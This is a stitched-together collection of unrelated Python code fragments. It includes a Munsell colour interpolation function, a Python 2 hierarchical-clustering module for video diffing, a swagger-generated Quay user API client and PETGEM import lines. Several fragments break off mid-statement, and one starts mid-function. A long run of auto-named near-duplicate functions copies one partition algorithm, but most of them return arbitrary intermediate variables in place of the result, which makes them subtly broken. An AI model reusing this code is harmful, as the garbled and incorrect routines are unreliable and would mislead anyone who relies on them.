Return whether to use linear or radial interpolation when drawing ovoids
through data points in the *Munsell Renotation System* data from given
specification.
Parameters
----------
specification
*Munsell* *Colorlab* specification.
Returns
-------
:py:data:`None` or :class:`str`
Interpolation method.
References
----------
:cite:`Centore2014l`
Examples
--------
>>> interpolation_method_from_renotation_ovoid([2.5, 5.0, 12.0, 4])
'Radial'
"""
specification = normalise_munsell_specification(specification)
interpolation_methods: Dict[
Integer, Optional[Literal["Linear", "Radial"]]
] = {
0: None,
1: "Linear",
2: "Radial",
}
if is_grey_munsell_colour(specification):
# No interpolation needed for grey colours.
interpolation_method = 0
else:
hue, value, chroma, code = specification
attest(
0 <= value <= 10,
f'"{specification}" specification value must be normalised to '
f"domain [0, 10]!",
)
attest(
is_integer(value),
f'"{specification}" specification value must be an integer!',
)
value = round(value)
attest(
2 <= chroma <= 50,
f'"{specification}" specification chroma must be normalised to '
f"domain [2, 50]!",
)
attest(
abs(2 * (chroma / 2 - round(chroma / 2))) <= INTEGER_THRESHOLD,
f'"{specification}" specification chroma must be an integer and '
f"multiple of 2!",
)
chroma = 2 * round(chroma / 2)
interpolation_method = 0
# Standard Munsell Renotation System hue, no interpolation needed.
if hue % 2.5 == 0:
interpolation_method = 0
ASTM_hue = hue_to_ASTM_hue([hue, code])
if value == 1:
if chroma == 2:
if 15 < ASTM_hue < 30 or 60 < ASTM_hue < 85:
interpolation_method = 2
else:
interpolation_method = 1
elif chroma == 4:
if 12.5 < ASTM_hue < 27.5 or 57.5 < ASTM_hue < 80:
interpolation_method = 2
else:
interpolation_method = 1
elif chroma == 6:
if 55 < ASTM_hue < 80:
interpolation_method = 2
else:
interpolation_method = 1
elif chroma == 8:
if 67.5 < ASTM_hue < 77.5:
interpolation_method = 2
else:
interpolation_method = 1
elif chroma >= 10:
# NOTE: This condition is likely never "True" while producing a
# valid "Munsell Specification" in practice: 1M iterations with
# random numbers never reached this code path while producing a
# valid "Munsell Specification".
            if 72.5 < ASTM_hue
# Source: NeTatsu/video-diff, file: Python/Clustering.py
"""
The most efficient approach would be to use OpenCV's
cv::flann::hierarchicalClustering, but we do NOT have Python bindings to it.
See if you have the time:
http://opencvpython.blogspot.ro/2013/01/k-means-clustering-3-working-with-opencv.html
Other ideas at:
- https://stackoverflow.com/questions/1793532/how-do-i-determine-k-when-using-k-means-clustering
- "Basically, you want to find a balance between two variables:
the number of clusters (k) and the average variance of the clusters."
- "First build a minimum spanning tree of your data. Removing the K-1 most expensive edges splits the tree into K clusters,
so you can build the MST once, look at cluster spacings / metrics for various K, and take the knee of the curve.
This works only for Single-linkage_clustering, but for that it's fast and easy. Plus, MSTs make good visuals."
- https://stackoverflow.com/questions/15376075/cluster-analysis-in-r-determine-the-optimal-number-of-clusters
https://en.wikipedia.org/wiki/Variance
NOT useful:
http://classroom.synonym.com/calculate-average-variance-extracted-2842.html
"""
import cv2
import numpy as np
import scipy.cluster.hierarchy as sch
from matplotlib import pyplot as plt
import common
import config
colors = ['b', 'r', 'g', 'y', "w", "magenta", "brown", "pink", "orange", \
"purple"]
def sqr(r):
return r * r
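# A minimal sketch (not part of the original pipeline) of the MST-based idea
# quoted in the module docstring above: build a minimum spanning tree once,
# then cut the k - 1 most expensive edges to split it into k clusters. The
# function name and its reliance on scipy.sparse.csgraph are illustrative
# assumptions, not existing project APIs.
def EstimateClustersViaMST(points, k):
    from scipy.sparse.csgraph import minimum_spanning_tree, connected_components
    from scipy.spatial.distance import pdist, squareform
    # Dense matrix of pairwise Euclidean distances between the points.
    dists = squareform(pdist(points))
    mst = minimum_spanning_tree(dists).toarray()
    if k > 1:
        # Threshold at the (k - 1)-th heaviest MST edge and drop every edge
        # at or above it, which yields (at least) k connected components.
        cut = np.sort(mst[mst > 0])[-(k - 1)]
        mst[mst >= cut] = 0
    # The surviving connected components are the clusters.
    _, labels = connected_components(mst, directed=False)
    return labels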
"""
This uses SciPy - see scipy-ref.pdf, Section 3.1.1.
I guess this is similar to cv::flann::hierarchicalClustering() .
Note: the number of clusters is dependent on the threshold var defined below.
IMPORTANT: We return only the elements from Z that are part of the MEANINGFUL
clusters obtained with hierarchicalClustering().
See if you have the time:
http://nbviewer.ipython.org/github/herrfz/dataanalysis/tree/master/data/
http://nbviewer.ipython.org/github/herrfz/dataanalysis/blob/master/week4/clustering_example.ipynb
"""
def HierarchicalClustering(Z, N):
if False:
print "Z = %s" % str(Z);
"""
Z = []
Traceback (most recent call last):
File "ReadAVI.py", line 365, in <module>
Main()
File "ReadAVI.py", line 295, in Main
res = MatchFrames.Main_img2(img2, counter2)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 776, in Main_img2
res = match_and_draw("Image Match")
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 593, in match_and_draw
nonp1 = ClusterUnmatchedKeypoints(nonp1)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 110, in ClusterUnmatchedKeypoints
Z = Clustering.HierarchicalClustering(Z, N)
File "/home/alexsusu/drone-diff/02/Clustering.py", line 64, in HierarchicalClustering
dSch = sch.distance.pdist(Z)
File "/usr/lib/python2.7/dist-packages/scipy/spatial/distance.py", line 1173, in pdist
raise ValueError('A 2-dimensional array must be passed.')
ValueError: A 2-dimensional array must be passed.
Z = [[ 265. 127.]]
Traceback (most recent call last):
File "ReadAVI.py", line 365, in <module>
Main()
File "ReadAVI.py", line 295, in Main
res = MatchFrames.Main_img2(img2, counter2)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 776, in Main_img2
res = match_and_draw("Image Match")
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 593, in match_and_draw
nonp1 = ClusterUnmatchedKeypoints(nonp1)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 110, in ClusterUnmatchedKeypoints
Z = Clustering.HierarchicalClustering(Z, N)
File "/home/alexsusu/drone-diff/02/Clustering.py", line 65, in HierarchicalClustering
dSch = sch.distance.pdist(Z)
File "/usr/lib/python2.7/dist-packages/scipy/spatial/distance.py", line 1173, in pdist
raise ValueError('A 2-dimensional array must be passed.')
ValueError: A 2-dimensional array must be passed.
Z = [[ 430. 61. ]
[ 265. 127. ]
[ 300. 79. ]
[ 481. 54. ]
[ 450.00003052 91.20000458]
[ 327.62884521 143.07841492]
[ 261.27365112 99.53282166]
[ 292.62652588 119.43939209]
[ 313.52841187 152.28521729]
[ 358.31817627 101.52348328]]
Traceback (most recent call last):
File "ReadAVI.py", line 365, in <module>
Main()
File "ReadAVI.py", line 295, in Main
res = MatchFrames.Main_img2(img2, counter2)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 776, in Main_img2
res = match_and_draw("Image Match")
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 593, in match_and_draw
nonp1 = ClusterUnmatchedKeypoints(nonp1)
File "/home/alexsusu/drone-diff/02/MatchFrames.py", line 110, in ClusterUnmatchedKeypoints
Z = Clustering.HierarchicalClustering(Z, N)
File "/home/alexsusu/drone-diff/02/Clustering.py", line 145, in HierarchicalClustering
numElems[e] += 1
IndexError: list index out of range
"""
if False:
Z = [[ 430., 61. ],
[ 265., 127. ],
[ 300., 79. ],
[ 481., 54. ],
[ 450.00003052, 91.20000458],
[ 327.62884521, 143.07841492],
[ 261.27365112, 99.53282166],
[ 292.62652588, 119.43939209],
[ 313.52841187, 152.28521729],
[ 358.31817627, 101.52348328]];
N = len(Z);
common.DebugPrint("HierarchicalClustering(): N = %d" % N);
    # Note: Z is not a standard Python list, but a numpy array
if len(Z) < 10: #or Z == []:
common.DebugPrint("HierarchicalClustering(): Bailing out of hierarchical " \
"clustering since too few elements provided (and I guess we" \
"could have issues)");
return [];
    # Vector of (N choose 2) pairwise Euclidean distances
dSch = sch.distance.pdist(Z);
dMax = dSch.max();
if False:
common.DebugPrint("Z = %s" % str(Z));
# This parameter is CRUCIAL for the optimal number of clusters generated
#threshold = 0.1 * dMax;
threshold = 0.05 * dMax; # This parameter works better for the videos from Lucian
"""
I did not find much information on the linkage matrix (linkageMatrix), but
from my understanding it is the direct result of the hierarchical
clustering, which is performed by recursively splitting clusters,
forming a dendrogram forest of trees (see if you have time
https://stackoverflow.com/questions/5461357/hierarchical-k-means-in-opencv-without-knowledge-of-k
"a forest of hierarchical clustering trees").
    The linkage matrix stores on each row data for a clustered point:
      - the last element in the row is the leaf in the dendrogram tree forest
          the point belongs to. The leaf does not really tell you to which
          final cluster the point belongs - (IMPORTANT) for this, we
          have the function sch.fcluster().
See if you have the time (for some better understanding):
https://stackoverflow.com/questions/11917779/how-to-plot-and-annotate-hierarchical-clustering-dendrograms-in-scipy-matplotlib
See doc:
http://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html#scipy.cluster.hierarchy.linkage
See if you have the time:
https://stackoverflow.com/questions/16883412/how-do-i-get-the-subtrees-of-dendrogram-made-by-scipy-cluster-hierarchy
"""
linkageMatrix = sch.linkage(dSch, "single");
common.DebugPrint("linkageMatrix = %s" % str(linkageMatrix));
# Inspired from https://stackoverflow.com/questions/7664826/how-to-get-flat-clustering-corresponding-to-color-clusters-in-the-dendrogram-cre
indexCluster = sch.fcluster(linkageMatrix, threshold, "distance");
common.DebugPrint("indexCluster = %s" % str(indexCluster));
cMax = -1;
    numElems = [0] * (N + 1); # We later "truncate" the trailing zeros from numElems
# IMPORTANT: It appears the ids of the clusters start from 1, not 0
for e in indexCluster:
#print "e = %s" % str(e)
numElems[e] += 1;
if cMax < e:
cMax = e;
#cMax += 1
# cMax is the MAXIMUM optimal number of clusters after the Hierarchical clustering
common.DebugPrint("cMax (the MAX id of final clusters) = %d" % cMax);
numElems = numElems[0 : cMax + 1];
common.DebugPrint("numElems = %s" % str(numElems));
"""
# We can also use:
numElems.__delslice__(cMax + 1, len(numElems))
but it's sort of deprecated
- see http://docs.python.org/release/2.5.2/ref/sequence-methods.html
"""
numClusters = 0;
for e in numElems:
if e != 0:
numClusters += 1;
common.DebugPrint("numClusters (the optimal num of clusters) = %d" % \
numClusters);
assert numClusters == cMax;
numClustersAboveThreshold = 0;
for i in range(cMax + 1):
if numElems[i] >= \
config.THRESHOLD_NUM_NONMATCHED_ELEMENTS_IN_CLUSTER:
common.DebugPrint("numElems[%d] = %d" % (i, numElems[i]));
numClustersAboveThreshold += 1;
common.DebugPrint("numClustersAboveThreshold = %d" % \
numClustersAboveThreshold)
RETURN_ONLY_BIGGEST_CLUSTER = False; #True;
if RETURN_ONLY_BIGGEST_CLUSTER == True:
# !!!!TODO: find biggest cluster - sort them after numElems, etc
res = [];
for i in range(N):
if indexCluster[i] == numClusters: # We start numbering the clusters from 1
res.append(Z[i]);
else:
if False:
# We return only the elements from the MEANINGFUL clusters
res = [];
for i in range(N):
if numElems[indexCluster[i]] >= \
config.THRESHOLD_NUM_NONMATCHED_ELEMENTS_IN_CLUSTER:
res.append(Z[i]);
else:
res = {};
for i in range(N):
if numElems[indexCluster[i]] >= \
config.THRESHOLD_NUM_NONMATCHED_ELEMENTS_IN_CLUSTER:
if indexCluster[i] not in res:
res[indexCluster[i]] = [];
res[indexCluster[i]].append(Z[i]);
if config.USE_GUI and config.DISPLAY_PYTHON_CLUSTERING:
# We clear the figure and the axes
plt.clf();
plt.cla();
# Plot the data
for i in range(N): #indexCluster:
#print "Z[i, 0] = %.2f, Z[i, 1] = %.2f" % (Z[i, 0], Z[i, 1])
if False:
# We plot only the "interesting" clusters
if numElems[indexCluster[i]] >= \
config.THRESHOLD_NUM_NONMATCHED_ELEMENTS_IN_CLUSTER:
plt.scatter(Z[i, 0], Z[i, 1], c=colors[indexCluster[i]]);
else:
try:
colCluster = colors[indexCluster[i]];
except: # IndexError: list index out of range
colCluster = 2;
plt.scatter(Z[i, 0], Z[i, 1], c=colCluster)
plt.xlabel("Height. (numClusters = %d, numClustersAboveThreshold = %d)" % \
(numClusters, numClustersAboveThreshold));
plt.ylabel("Weight");
# From http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.axis
v = plt.axis();
        # We invert the y axis (0 at the top) and start the x axis at 0
v = (0, v[1], v[3], 0);
#plt.gca().invert_yaxis()
plt.axis(v);
plt.show();
if False:
plt.savefig("plot-%s.png" % (prefix));
if False:
sch.dendrogram(linkageMatrix,
truncate_mode='lastp',
color_threshold=1,
show_leaf_counts=True)
plt.show();
if False:
plt.savefig("plot-%s.png" % (prefix));
return res;
"""
This uses Python and OpenCV's cv2 module.
Note: unfortunately, cv::flann::hierarchicalClustering()
doesn't have Python bindings, so we have to sort of
implement it :) .
"""
def HierarchicalClusteringWithCV2_UNFINISHED(Z, N):
#X = np.random.randint(25,50,(25,2))
#Y = np.random.randint(60,85,(25,2))
#Z = np.vstack((X, Y))
# We choose an ~optimal number of clusters
#k = 4
minValidity = 1000000
minValidityK = -1
for k in range(2, 10 + 1):
A = [None] * k
#avg = [0] * k
"""
Inspired a bit from
https://www.google-melange.com/gsoc/project/google/gsoc2013/abidrahman2/43002,
\source\py_tutorials\py_ml\py_kmeans\py_kmeans_opencv\py_kmeans_opencv.rst
"""
# Define criteria and apply kmeans()
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
t1 = float(cv2.getTickCount())
#ret, label, center = cv2.kmeans(Z, 2, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
ret, label, center = cv2.kmeans(Z, k, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return t
def func_891713351c9841cb9268514a5296b1c2(N, D):
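    # Sliding-window sketch of what follows: D is split into three
    # contiguous runs A | B | C (prefix, middle, suffix). b grows the middle
    # to the right; for each b, a advances as long as doing so still lowers
    # max(A, B, C). ans tracks the smallest achievable "largest part", and
    # the final answer is the fraction of the total sum outside that part.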
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return A
def func_78ded00109c14957aa3d3ec9c29786d9(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return S
def func_50d651b599f94fb9ab8fddaae5928de5(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return ans
def func_8aeea14840a6415ab51f28c509c95a64(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return a
def func_1ef869d3b1944dd985faa504aa34695d(N, D):
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
ans = float(S - ans) / S
return C
def func_10ce8592aad748f59dc974c93ae5fac8(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
    ans = float(S - ans) / S
    print('Case #%s: %.16f' % (test + 1, ans))
return p
def func_fd421d4abf4547c4a718479f3c9a3eef(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
    ans = float(S - ans) / S
    print('Case #%s: %.16f' % (test + 1, ans))
return t
def func_dfce3f9b3d79451786574d15c3d0fea8(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
    ans = float(S - ans) / S
    print('Case #%s: %.16f' % (test + 1, ans))
return C
def func_3ebe0d54479249e08e7171e9a9f7f4f3(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
    ans = float(S - ans) / S
    print('Case #%s: %.16f' % (test + 1, ans))
return b
def func_4ce6f82c02e94d1598a2ba1f86f1d06c(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
    ans = float(S - ans) / S
    print('Case #%s: %.16f' % (test + 1, ans))
return ans
def func_2ef82ccb538a48659576eeff63cca899(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
    ans = float(S - ans) / S
    print('Case #%s: %.16f' % (test + 1, ans))
return A
def func_747f475b4bff402f9453b4185b726016(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
    ans = float(S - ans) / S
    print('Case #%s: %.16f' % (test + 1, ans))
return a
def func_dbb0b112a7474c09a481f489f763e9db(test, N, D, S):
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
b += 1
C -= D[b]
B += D[b]
p = max(A, B, C)
while a < b:
B -= D[a]
A += D[a]
a += 1
t = max(A, B, C)
if t >= p:
a -= 1
B += D[a]
A -= D[a]
break
p = t
ans = min(ans, p)
    ans = float(S - ans) / S
    print('Case #%s: %.16f' % (test + 1, ans))
return B
def func_563f732d2574488bbcf6fa4ee9fffe08(infile):
N, p, q, r, s = map(int, infile.readline().split())
D = [((i * p + q) % r + s) for i in range(N)]
S = sum(D)
ans = S
A, B, C = 0, 0, S
a = 0
b = -1
while b < N - 1:
        b += 1
# coding: utf-8
"""
Quay Frontend
This API allows you to perform many of the operations required to work with Quay repositories, users, and organizations. You can find out more at <a href=\"https://quay.io\">Quay</a>. # noqa: E501
OpenAPI spec version: v1
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from quay.api_client import ApiClient
class UserApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
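    # Minimal usage sketch (illustrative; the NewStarredRepository fields
    # shown below are assumptions, not verified against the generated
    # models):
    #
    #     api = UserApi()
    #     api.create_star(NewStarredRepository(namespace='ns', repository='repo'))
    #     user = api.get_logged_in_user()
    #     api.delete_star('ns/repo')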
def create_star(self, body, **kwargs): # noqa: E501
"""create_star # noqa: E501
Star a repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_star(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param NewStarredRepository body: Request body contents. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_star_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_star_with_http_info(body, **kwargs) # noqa: E501
return data
def create_star_with_http_info(self, body, **kwargs): # noqa: E501
"""create_star # noqa: E501
Star a repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_star_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param NewStarredRepository body: Request body contents. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_star" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_star`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_implicit'] # noqa: E501
return self.api_client.call_api(
'/api/v1/user/starred', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_star(self, repository, **kwargs): # noqa: E501
"""delete_star # noqa: E501
Removes a star from a repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_star(repository, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str repository: The full path of the repository. e.g. namespace/name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_star_with_http_info(repository, **kwargs) # noqa: E501
else:
(data) = self.delete_star_with_http_info(repository, **kwargs) # noqa: E501
return data
def delete_star_with_http_info(self, repository, **kwargs): # noqa: E501
"""delete_star # noqa: E501
Removes a star from a repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_star_with_http_info(repository, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str repository: The full path of the repository. e.g. namespace/name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['repository'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_star" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'repository' is set
if ('repository' not in params or
params['repository'] is None):
raise ValueError("Missing the required parameter `repository` when calling `delete_star`") # noqa: E501
collection_formats = {}
path_params = {}
if 'repository' in params:
path_params['repository'] = params['repository'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_implicit'] # noqa: E501
return self.api_client.call_api(
'/api/v1/user/starred/{repository}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_logged_in_user(self, **kwargs): # noqa: E501
"""get_logged_in_user # noqa: E501
Get user information for the authenticated user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logged_in_user(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: UserView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_logged_in_user_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_logged_in_user_with_http_info(**kwargs) # noqa: E501
return data
def get_logged_in_user_with_http_info(self, **kwargs): # noqa: E501
"""get_logged_in_user # noqa: E501
Get user information for the authenticated user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logged_in_user_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: UserView
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_logged_in_user" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_implicit'] # noqa: E501
return self.api_client.call_api(
'/api/v1/user/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserView', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_information(self, username, **kwargs): # noqa: E501
"""get_user_information # noqa: E501
Get user information for the specified user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_information(username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_information_with_http_info(username, **kwargs) # noqa: E501
else:
(data) = self.get_user_information_with_http_info(username, **kwargs) # noqa: E501
return data
def get_user_information_with_http_info(self, username, **kwargs): # noqa: E501
"""get_user_information # noqa: E501
Get user information for the specified user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_information_with_http_info(username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['username'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_information" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in params or
params['username'] is None):
raise ValueError("Missing the required parameter `username` when calling `get_user_information`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in params:
path_params['username'] = params['username'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/users/{username}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_starred_repos(self, **kwargs): # noqa: E501
"""list_starred_repos # noqa: | |
# Source: ocastilloreyes/petgem
#!/usr/bin/env python3
# Author: <NAME>
# Contact: <EMAIL>
"""Define data preprocessing operations for **PETGEM**."""
# ---------------------------------------------------------------
# Load python modules
# ---------------------------------------------------------------
import numpy as np
import h5py
import meshio
from scipy.spatial import Delaunay
from petsc4py import PETSc
# ---------------------------------------------------------------
# Load petgem modules (BSC)
# ---------------------------------------------------------------
from .common import Print, Timers, measure_all_class_methods
from .parallel import MPIEnvironment, createSequentialDenseMatrixWithArray
from .parallel import writeParallelDenseMatrix, createSequentialVectorWithArray
from .parallel import writePetscVector
from .mesh import computeEdges, computeBoundaryEdges, computeFacesEdges
from .mesh import computeFaces, computeBoundaryFaces
from .mesh import computeBoundaryElements, computeBoundaries, computeFacePlane
